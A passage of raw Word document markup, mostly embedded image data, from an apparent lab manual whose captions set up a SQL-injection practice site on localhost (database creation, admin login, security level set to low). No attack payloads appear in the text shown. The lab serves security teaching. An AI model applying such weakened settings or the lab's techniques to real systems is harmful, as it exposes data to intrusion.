4DW1SC+yjGm38Ujkre0b&#10;xr4i8Upc32pWB0a+istPOmXssAiP2W3uPNKL8srb5/8AlqskX7pf3X+t83H1vxjrXhLxh4luZ4l1&#10;jTdJ8N2GoX7+f9lhRUlvfNe3g/e/vZVi+RPu/uvmlX5d3Zal4OttSvZbqK/1LR2uP+P9NJlWJL/+&#10;D97+6dkbb8vmxNFLt2/N+6i2VdS+HWi6la63beVPZ2mr6PFoUtvY+VEkVqv2jZ5SbPlb/Spf9n7n&#10;yVUYv7SIkpfZMLWPjNp+leNZdDll0tPs99a6bLbzan5WoSyz+V5T29rs/exf6RFvfzV+5L8nyfPv&#10;+HfFGp+Ir6eaDSLcaCl5dWSXi3n+lLLBLLE7y27Kq+V5sT7Nssr/ADRfInzeVaXwnHFrFxf22rat&#10;YRXlwt3eaZa3KLaXNwqIiSy/J5v3Iol2LKsT+V8ytul3N0zwXb6NqT3NtqOpLaefLdppnnp9liuJ&#10;Xd5W+RPNfc0srbJZWi+b5VXbFsVly/AF6nNucx8DfG//AAmfgTw+0FyuqpZ6Za2+p6o915r/AG/7&#10;PEzxf7TLv/eu38TIvzP5vlUfEtzYy/FPVbPWI/FF3aRaPYSwW/h59WZI3e4vfNZksP7+yL/W/wBy&#10;u28PeCdP8Krp/wBhlu3+x6Tb6Qr3Eu/zYIP+Pfzfk++m+X7m3/Wvv3/Jtuw6DbW3iG91pWn+23lr&#10;BZSo7fJ5UTysmz/a/wBIl/8AHKevNKUUFpcsYyOL8OeJtc0u68O+HrrSbi6uNTOo3KTXtz5UtrYR&#10;XUS2/m7t8rN9nni+/wDvd/8Ardv72WKDwl8VF1LSdCtotIa21DUYtLexsZtRe4eW1urfzXle4b+K&#10;Jbe9+/8ANL9l/wCmqV3c2g21z4hstaZp/ttnaz2USI3yeVK8TPv/ANr/AEeL/wAfrK0T4eaLoL+H&#10;3topXfRNOTTbZ7jynd4lRER5W2fNKi+aiv8ALt+0XH/PV6dl/IFqkfhPP9H+J0Wm2UviGdpbbSpf&#10;DHh64gtNR1FnitZby4uot8txLvbb88Xmy/M22Ld81dBo/wAWl8Q2ES6VFpep6tLqzaPE9pqbS6Y0&#10;v2X7Vv8AtSxbtnlfL/qv9b8n3fmrVsPhRoenWEVnBLqOyDTtN0yCXz082JLGV5bWVfk/1qSvu+f5&#10;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&#10;SwUGAAAAAAYABgB9AQAAI7MBAAAA&#10;">
            <v:line id=" 182" o:spid="_x0000_s1027" style="position:absolute;visibility:visible" from="1412,5059" to="10831,5059" o:connectortype="straight" o:gfxdata="UEsDBBQABgAIAAAAIQCcrWMz7wAAAIgBAAATAAAAW0NvbnRlbnRfVHlwZXNdLnhtbHyQTU7EMAxG&#10;90jcIfIWtSksEELTzoLCEhAaDmAlbhtN60RxKDO3J+0ACwQs/fP5PXmzPUyjmimK81zDZVmBIjbe&#10;Ou5reN09FDegJCFbHD1TDUcS2DbnZ5vdMZConGapYUgp3GotZqAJpfSBOE86HydMuYy9Dmj22JO+&#10;qqprbTwn4lSk5QY0m5Y6fBuTuj/k9skk0iig7k6LC6sGDGF0BlM21TPbH5Tik1Dm5LojgwtykTVA&#10;6V8R6+hPwlfwKT8nOkvqGWN6xCmLaBtFW//Okeby/yuL5ySF7zpnqGyjtDn2QvO3l17/2HwAAAD/&#10;/wMAUEsDBBQABgAIAAAAIQBR5/GmvwAAABYBAAALAAAAX3JlbHMvLnJlbHNsz8FqwzAMBuD7YO9g&#10;dF+U7lDGiNNbodfSPoCxlcQstoxksvXtZ3pqx46S+D9Jw+EnrWYj0cjZwq7rwVD2HGKeLVwvx7cP&#10;MFpdDm7lTBZupHAYX1+GM62utpAusahpSlYLS63lE1H9Qslpx4Vym0wsydVWyozF+S83E773/R7l&#10;0YDxyTSnYEFOYQfmcitt8x87RS+sPNXOc0Kepuj/UzHwdz7T1hQnM1ULQfTeFNq6dhwYHAd8+mb8&#10;BQAA//8DAFBLAwQUAAYACAAAACEA/qnKdMoAAADiAAAADwAAAGRycy9kb3ducmV2LnhtbESPTUvD&#10;QBCG70L/wzKCN7uxlVTSbkurCD3ZDwu9TrNjEszOht01jf/eOQi9DLwM7/PyLFaDa1VPITaeDTyN&#10;M1DEpbcNVwZOn++PL6BiQrbYeiYDvxRhtRzdLbCw/soH6o+pUgLhWKCBOqWu0DqWNTmMY98Ry+/L&#10;B4dJYqi0DXgVuGv1JMty7bBhWaixo9eayu/jjzMw2TebMz5v3H7X7z7ybX+Zzi7BmIf74W0uZz0H&#10;lWhIt8Y/YmsNTHNxECOxAaWXfwAAAP//AwBQSwECLQAUAAYACAAAACEAnK1jM+8AAACIAQAAEwAA&#10;AAAAAAAAAAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBR5/GmvwAA&#10;ABYBAAALAAAAAAAAAAAAAAAAACABAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQD+qcp0ygAA&#10;AOIAAAAPAAAAAAAAAAAAAAAAAAgCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA/wIA&#10;AAAA&#10;" strokecolor="#a3a3a3">
              <o:lock v:ext="edit" shapetype="f"/>
            </v:lin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 181" o:spid="_x0000_s1028" type="#_x0000_t75" style="position:absolute;left:1470;top:239;width:7485;height:4755;visibility:visible" o:gfxdata="UEsDBBQABgAIAAAAIQCcrWMz7wAAAIgBAAATAAAAW0NvbnRlbnRfVHlwZXNdLnhtbHyQTU7EMAxG&#10;90jcIfIWtSksEELTzoLCEhAaDmAlbhtN60RxKDO3J+0ACwQs/fP5PXmzPUyjmimK81zDZVmBIjbe&#10;Ou5reN09FDegJCFbHD1TDUcS2DbnZ5vdMZConGapYUgp3GotZqAJpfSBOE86HydMuYy9Dmj22JO+&#10;qqprbTwn4lSk5QY0m5Y6fBuTuj/k9skk0iig7k6LC6sGDGF0BlM21TPbH5Tik1Dm5LojgwtykTVA&#10;6V8R6+hPwlfwKT8nOkvqGWN6xCmLaBtFW//Okeby/yuL5ySF7zpnqGyjtDn2QvO3l17/2HwAAAD/&#10;/wMAUEsDBBQABgAIAAAAIQBR5/GmvwAAABYBAAALAAAAX3JlbHMvLnJlbHNsz8FqwzAMBuD7YO9g&#10;dF+U7lDGiNNbodfSPoCxlcQstoxksvXtZ3pqx46S+D9Jw+EnrWYj0cjZwq7rwVD2HGKeLVwvx7cP&#10;MFpdDm7lTBZupHAYX1+GM62utpAusahpSlYLS63lE1H9Qslpx4Vym0wsydVWyozF+S83E773/R7l&#10;0YDxyTSnYEFOYQfmcitt8x87RS+sPNXOc0Kepuj/UzHwdz7T1hQnM1ULQfTeFNq6dhwYHAd8+mb8&#10;BQAA//8DAFBLAwQUAAYACAAAACEAkjXefMoAAADiAAAADwAAAGRycy9kb3ducmV2LnhtbESPzWrD&#10;MBCE74W+g9hCbo2cmJrgRAn5hV56qBPIdSttbRNrZSw5cfr0VaGQy8AwzDfMYjXYRlyp87VjBZNx&#10;AoJYO1NzqeB0PLzOQPiAbLBxTAru5GG1fH5aYG7cjT/pWoRSRAj7HBVUIbS5lF5XZNGPXUscs2/X&#10;WQzRdqU0Hd4i3DZymiSZtFhzXKiwpW1F+lL0VsHmrD9++mG/KSZvWZ82s/TrpFOlRi/Dbh5lPQcR&#10;aAiPxj/i3ShIsyn8PYpvQMjlLwAAAP//AwBQSwECLQAUAAYACAAAACEAnK1jM+8AAACIAQAAEwAA&#10;AAAAAAAAAAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBR5/GmvwAA&#10;ABYBAAALAAAAAAAAAAAAAAAAACABAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQCSNd58ygAA&#10;AOIAAAAPAAAAAAAAAAAAAAAAAAgCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA/wIA&#10;AAAA&#10;">
              <v:imagedata r:id="rId75" o:title=""/>
              <v:path arrowok="t"/>
              <o:lock v:ext="edit" aspectratio="f"/>
            </v:shape>
            <w10:wrap type="topAndBottom" anchorx="page"/>
          </v:group>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="00390B00" w:rsidRPr="00D4195F" w:rsidRDefault="00390B00">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:sectPr w:rsidR="00390B00" w:rsidRPr="00D4195F">
          <w:footerReference w:type="default" r:id="rId76"/>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:top="680" w:right="1040" w:bottom="1160" w:left="1220" w:header="0" w:footer="85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390B00" w:rsidRPr="00D4195F" w:rsidRDefault="00296621">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="7565"/>
          <w:tab w:val="left" w:pos="8316"/>
        </w:tabs>
        <w:spacing w:before="158"/>
        <w:ind w:left="221"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:color w:val="808080"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00390B00" w:rsidRPr="00D4195F" w:rsidRDefault="00390B00">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="3"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00390B00" w:rsidRPr="00D4195F" w:rsidRDefault="003D03C4">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="221"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:t xml:space="preserve">Step </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:t>3 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:t xml:space="preserve"> Create database with name </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:t>sql_db</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00390B00" w:rsidRPr="00D4195F" w:rsidRDefault="003D03C4">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="3"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="25146982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5218100" cy="3386518"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="547" name="image2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2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00" cy="3386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Default="003D03C4">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="197"/>
        <w:ind w:left="221"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t xml:space="preserve">Step </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:t>4 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t xml:space="preserve">Go </w:t>
      </w:r>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t xml:space="preserve">to </w:t>
      </w:r>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t xml:space="preserve">site </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t>localhost</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t>sql_injection</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t xml:space="preserve">/setup.php </w:t>
      </w:r>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t xml:space="preserve">and </w:t>
      </w:r>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t xml:space="preserve">click </w:t>
      </w:r>
      <w:r w:rsidRPr="00D4195F">
        <w:t>on</w:t>
      </w:r>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:spacing w:val="57"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t xml:space="preserve">create/reset </w:t>
      </w:r>
      <w:r w:rsidRPr="00D4195F">
        <w:t>database.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D4195F" w:rsidRPr="00D4195F" w:rsidRDefault="00D4195F">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="197"/>
        <w:ind w:left="221"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00390B00" w:rsidRPr="00D4195F" w:rsidRDefault="003D03C4">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="8"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="25147084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161876</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5335682" cy="3678459"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="549" name="image2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27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682" cy="3678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  <w:spacing w:before="2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80" w:right="1040" w:bottom="1260" w:left="1220" w:header="0" w:footer="85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390B00" w:rsidRPr="00D4195F" w:rsidRDefault="00296621">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="7565"/>
          <w:tab w:val="left" w:pos="8316"/>
        </w:tabs>
        <w:spacing w:before="158"/>
        <w:ind w:left="221"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:color w:val="808080"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00390B00" w:rsidRPr="00D4195F" w:rsidRDefault="00390B00">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="4"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00390B00" w:rsidRPr="00D4195F" w:rsidRDefault="003D03C4">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="221"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:t xml:space="preserve">Step </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:t>5 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:t xml:space="preserve"> Go to login.php and login using admin and .</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00390B00" w:rsidRPr="00D4195F" w:rsidRDefault="003D03C4">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="3"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="25147187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166032</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5132244" cy="3386518"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="551" name="image2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27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244" cy="3386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D03C4">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="197"/>
        <w:ind w:left="221"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:t xml:space="preserve">Step </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:t>6 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:t xml:space="preserve"> Opens the home page.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00390B00" w:rsidRPr="00D4195F" w:rsidRDefault="003D03C4">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="8"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="25147289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161876</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5239889" cy="3678459"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="553" name="image2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2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889" cy="3678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  <w:spacing w:before="5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20" w:right="1040" w:bottom="1280" w:left="1220" w:header="0" w:footer="85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390B00" w:rsidRPr="00D4195F" w:rsidRDefault="00296621">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="7565"/>
          <w:tab w:val="left" w:pos="8316"/>
        </w:tabs>
        <w:spacing w:before="158"/>
        <w:ind w:left="221"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:color w:val="808080"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00390B00" w:rsidRPr="00D4195F" w:rsidRDefault="00390B00">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="3"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00390B00" w:rsidRPr="00D4195F" w:rsidRDefault="003D03C4">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="221"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:t xml:space="preserve">Step </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:t>7 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:t xml:space="preserve"> Go to security setting option in left and set security level low.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00390B00" w:rsidRPr="00D4195F" w:rsidRDefault="003D03C4">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="3"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="25147392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5132244" cy="3386518"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="555" name="image2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2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244" cy="3386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D03C4">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
